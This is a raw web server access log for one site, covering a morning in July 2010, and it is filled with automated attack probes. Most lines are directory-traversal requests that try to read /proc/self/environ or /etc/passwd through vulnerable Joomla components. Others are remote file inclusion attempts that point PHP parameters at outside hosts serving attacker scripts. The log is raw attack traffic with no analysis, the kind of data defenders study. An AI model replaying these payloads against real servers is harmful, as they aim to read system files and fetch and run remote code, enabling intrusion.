91.121.144.61 - - [31/Jul/2010:06:57:05 -0700] "GET /logs//index.php?option=com_datsogallery&Itemid=com_datsogallery%22+%22Itemid=12=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
93.89.16.80 - - [31/Jul/2010:06:58:53 -0700] "GET /logs/access.log/////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
93.89.16.80 - - [31/Jul/2010:06:58:53 -0700] "GET ////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
93.89.16.80 - - [31/Jul/2010:06:58:54 -0700] "GET /logs/////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
93.89.16.80 - - [31/Jul/2010:07:00:21 -0700] "GET /logs/access.log/////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
93.89.16.80 - - [31/Jul/2010:07:00:22 -0700] "GET ////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
93.89.16.80 - - [31/Jul/2010:07:00:22 -0700] "GET /logs/////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
110.232.72.18 - - [31/Jul/2010:07:01:43 -0700] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
62.182.63.25 - - [31/Jul/2010:07:02:11 -0700] "GET /logs/access.log/////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
62.182.63.25 - - [31/Jul/2010:07:02:11 -0700] "GET ////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
62.182.63.25 - - [31/Jul/2010:07:02:12 -0700] "GET /logs/////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
114.108.151.149 - - [31/Jul/2010:07:05:35 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
91.121.144.61 - - [31/Jul/2010:07:05:43 -0700] "GET /logs/access_100428.log//index.php?option=com_datsogallery&Itemid=com_datsogallery%22+%22Itemid=12=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.hellionindustries.com"
74.208.167.164 - - [31/Jul/2010:07:19:27 -0700] "GET /comment_modify.php?dir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
74.208.167.164 - - [31/Jul/2010:07:19:27 -0700] "GET /logs/access_100428.log//comment_modify.php?dir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
74.208.167.164 - - [31/Jul/2010:07:19:27 -0700] "GET /logs//comment_modify.php?dir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
67.212.178.179 - - [31/Jul/2010:07:24:18 -0700] "GET /logs/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.hellionindustries.com"
67.212.178.179 - - [31/Jul/2010:07:24:18 -0700] "GET /index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.246.2.35 - - [31/Jul/2010:07:24:50 -0700] "GET /logs//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.hellionindustries.com"
216.246.2.35 - - [31/Jul/2010:07:24:50 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.hellionindustries.com"
216.246.2.35 - - [31/Jul/2010:07:24:54 -0700] "GET /logs//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.hellionindustries.com"
216.246.2.35 - - [31/Jul/2010:07:24:54 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.hellionindustries.com"
67.212.178.179 - - [31/Jul/2010:07:26:02 -0700] "GET /index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.hellionindustries.com"
213.189.224.16 - - [31/Jul/2010:07:27:57 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.hellionindustries.com"
62.182.63.25 - - [31/Jul/2010:07:28:24 -0700] "GET /logs/access.log/////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
62.182.63.25 - - [31/Jul/2010:07:28:24 -0700] "GET ////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
62.182.63.25 - - [31/Jul/2010:07:28:25 -0700] "GET /logs/////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
213.189.224.16 - - [31/Jul/2010:07:28:26 -0700] "GET /logs/access.log//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.hellionindustries.com"
213.189.224.16 - - [31/Jul/2010:07:28:26 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.hellionindustries.com"
213.189.224.16 - - [31/Jul/2010:07:28:27 -0700] "GET /logs//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.hellionindustries.com"
67.212.178.179 - - [31/Jul/2010:07:32:35 -0700] "GET /logs/access.log/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.hellionindustries.com"
67.212.178.179 - - [31/Jul/2010:07:32:38 -0700] "GET /index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.hellionindustries.com"
67.212.178.179 - - [31/Jul/2010:07:32:38 -0700] "GET /logs/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.hellionindustries.com"
65.13.185.104 - - [31/Jul/2010:07:33:15 -0700] "GET /logs/access.log//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
65.13.185.104 - - [31/Jul/2010:07:33:15 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
65.13.185.104 - - [31/Jul/2010:07:33:16 -0700] "GET /logs//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
65.13.185.104 - - [31/Jul/2010:07:33:21 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
77.88.24.27 - - [31/Jul/2010:07:33:23 -0700] "GET /logs/access_100628.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.hellionindustries.com"
75.136.121.230 - - [31/Jul/2010:07:34:37 -0700] "GET /?_PHPLIB[libdir]=http://www.kjep.co.kr//bbs/icon/su.pdf?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.hellionindustries.com"
75.136.121.230 - - [31/Jul/2010:07:34:40 -0700] "GET /logs/access_100601.log%20%20//?_PHPLIB[libdir]=http://www.kjep.co.kr//bbs/icon/su.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
110.232.72.18 - - [31/Jul/2010:07:35:50 -0700] "GET /logs/access_100615.log//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
110.232.72.18 - - [31/Jul/2010:07:35:51 -0700] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
110.232.72.18 - - [31/Jul/2010:07:35:54 -0700] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
75.136.121.230 - - [31/Jul/2010:07:36:05 -0700] "GET /logs/access_100601.log%20%20//?_PHPLIB[libdir]=http://www.kjep.co.kr//bbs/icon/su.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
75.136.121.230 - - [31/Jul/2010:07:36:09 -0700] "GET /?_PHPLIB[libdir]=http://www.kjep.co.kr//bbs/icon/su.pdf?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.hellionindustries.com"
75.136.121.230 - - [31/Jul/2010:07:36:16 -0700] "GET /logs//?_PHPLIB[libdir]=http://www.kjep.co.kr//bbs/icon/su.pdf?? HTTP/1.1" 200 1658 "-" "Mozilla/5.0" "www.hellionindustries.com"
213.189.224.16 - - [31/Jul/2010:07:36:33 -0700] "GET /logs/access.log//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.hellionindustries.com"
213.189.224.16 - - [31/Jul/2010:07:36:33 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.hellionindustries.com"
213.189.224.16 - - [31/Jul/2010:07:36:34 -0700] "GET /logs//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.hellionindustries.com"
110.232.72.18 - - [31/Jul/2010:07:37:40 -0700] "GET /logs/access_100615.log//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
110.232.72.18 - - [31/Jul/2010:07:37:41 -0700] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
110.232.72.18 - - [31/Jul/2010:07:37:42 -0700] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
146.83.237.120 - - [31/Jul/2010:07:38:02 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
146.83.237.120 - - [31/Jul/2010:07:38:02 -0700] "POST /logs/access_100429.log%20%20/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
146.83.237.120 - - [31/Jul/2010:07:38:02 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
146.83.237.120 - - [31/Jul/2010:07:38:04 -0700] "POST /logs/access_100429.log%20%20/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
146.83.237.120 - - [31/Jul/2010:07:38:05 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
146.83.237.120 - - [31/Jul/2010:07:38:05 -0700] "POST /logs/access_100429.log%20%20/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
146.83.237.120 - - [31/Jul/2010:07:38:05 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
146.83.237.120 - - [31/Jul/2010:07:38:06 -0700] "POST /logs/access_100429.log%20%20/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
146.83.237.120 - - [31/Jul/2010:07:38:06 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
146.83.237.120 - - [31/Jul/2010:07:38:06 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
146.83.237.120 - - [31/Jul/2010:07:38:07 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
146.83.237.120 - - [31/Jul/2010:07:38:07 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.hellionindustries.com"
213.189.224.16 - - [31/Jul/2010:07:38:11 -0700] "GET /logs/access_100602.log//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.hellionindustries.com"
75.136.121.230 - - [31/Jul/2010:07:38:36 -0700] "GET /logs//?_PHPLIB[libdir]=http://www.kjep.co.kr//bbs/icon/su.pdf?? HTTP/1.1" 200 1658 "-" "Mozilla/5.0" "www.hellionindustries.com"
75.136.121.230 - - [31/Jul/2010:07:38:36 -0700] "GET /?_PHPLIB[libdir]=http://www.kjep.co.kr//bbs/icon/su.pdf?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.hellionindustries.com"
75.136.121.230 - - [31/Jul/2010:07:38:40 -0700] "GET /logs/access_100601.log%20%20//?_PHPLIB[libdir]=http://www.kjep.co.kr//bbs/icon/su.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
83.137.192.96 - - [31/Jul/2010:07:42:37 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
83.137.192.96 - - [31/Jul/2010:07:42:37 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
83.137.192.96 - - [31/Jul/2010:07:42:37 -0700] "GET /logs/access_100428.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
83.137.192.96 - - [31/Jul/2010:07:42:56 -0700] "GET /logs/access_100428.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
83.137.192.96 - - [31/Jul/2010:07:42:56 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
83.137.192.96 - - [31/Jul/2010:07:42:56 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
83.137.192.96 - - [31/Jul/2010:07:43:03 -0700] "GET /logs/access_100429.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
83.137.192.96 - - [31/Jul/2010:07:43:18 -0700] "GET /logs/access_100429.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
83.137.192.96 - - [31/Jul/2010:07:45:38 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
83.137.192.96 - - [31/Jul/2010:07:45:38 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
83.137.192.96 - - [31/Jul/2010:07:45:39 -0700] "GET /logs/access_100429.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
83.137.192.96 - - [31/Jul/2010:07:45:45 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
83.137.192.96 - - [31/Jul/2010:07:45:45 -0700] "GET /logs/access_100429.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
83.137.192.96 - - [31/Jul/2010:07:45:46 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
83.137.192.96 - - [31/Jul/2010:07:45:56 -0700] "GET /logs/access_100428.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
83.137.192.96 - - [31/Jul/2010:07:45:58 -0700] "GET /logs/access_100428.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
83.137.192.96 - - [31/Jul/2010:07:46:47 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
83.137.192.96 - - [31/Jul/2010:07:46:47 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
83.137.192.96 - - [31/Jul/2010:07:46:47 -0700] "GET /logs/access_100429.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
220.130.9.116 - - [31/Jul/2010:07:56:38 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
220.130.9.116 - - [31/Jul/2010:07:56:38 -0700] "POST /logs/access.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
220.130.9.116 - - [31/Jul/2010:07:56:38 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.hellionindustries.com"
195.93.201.141 - - [31/Jul/2010:07:57:38 -0700] "GET /logs/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.hellionindustries.com"
195.93.201.141 - - [31/Jul/2010:07:57:38 -0700] "GET /plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.hellionindustries.com"
195.93.201.141 - - [31/Jul/2010:07:57:39 -0700] "GET /logs/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.hellionindustries.com"
195.93.201.141 - - [31/Jul/2010:07:57:39 -0700] "GET /plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.hellionindustries.com"
217.73.227.30 - - [31/Jul/2010:07:58:27 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
217.73.227.30 - - [31/Jul/2010:08:04:04 -0700] "GET /logs/access.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
217.73.227.30 - - [31/Jul/2010:08:04:05 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
71.42.236.229 - - [31/Jul/2010:08:04:05 -0700] "GET /include/admin.lib.inc.php?site_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
71.42.236.229 - - [31/Jul/2010:08:04:05 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
71.42.236.229 - - [31/Jul/2010:08:04:05 -0700] "GET /logs/access_100601.log//include/admin.lib.inc.php?site_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
217.73.227.30 - - [31/Jul/2010:08:04:05 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:08:05:07 -0700] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:08:05:08 -0700] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:08:05:27 -0700] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:08:05:27 -0700] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
71.42.236.229 - - [31/Jul/2010:08:05:36 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
71.42.236.229 - - [31/Jul/2010:08:05:36 -0700] "GET /include/admin.lib.inc.php?site_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
71.42.236.229 - - [31/Jul/2010:08:05:36 -0700] "GET /logs/access_100601.log%20%20//include/admin.lib.inc.php?site_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:08:05:39 -0700] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:08:05:39 -0700] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
110.138.208.125 - - [31/Jul/2010:08:05:55 -0700] "GET /logs/////bbs/write_update.php?board_skin_path=http://kunki.org/1/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
110.138.208.125 - - [31/Jul/2010:08:05:55 -0700] "GET /logs/access_100428.log%20%20/////bbs/write_update.php?board_skin_path=http://kunki.org/1/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:08:06:01 -0700] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:08:06:01 -0700] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:08:06:17 -0700] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:08:06:18 -0700] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
202.160.123.72 - - [31/Jul/2010:08:06:29 -0700] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
202.160.123.72 - - [31/Jul/2010:08:06:32 -0700] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:08:06:40 -0700] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
202.160.123.72 - - [31/Jul/2010:08:07:07 -0700] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
202.160.123.72 - - [31/Jul/2010:08:07:08 -0700] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
202.160.123.72 - - [31/Jul/2010:08:07:28 -0700] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
202.160.123.72 - - [31/Jul/2010:08:07:28 -0700] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
178.162.133.106 - - [31/Jul/2010:08:07:33 -0700] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.hellionindustries.com"
202.160.123.72 - - [31/Jul/2010:08:07:56 -0700] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.hellionindustries.com"
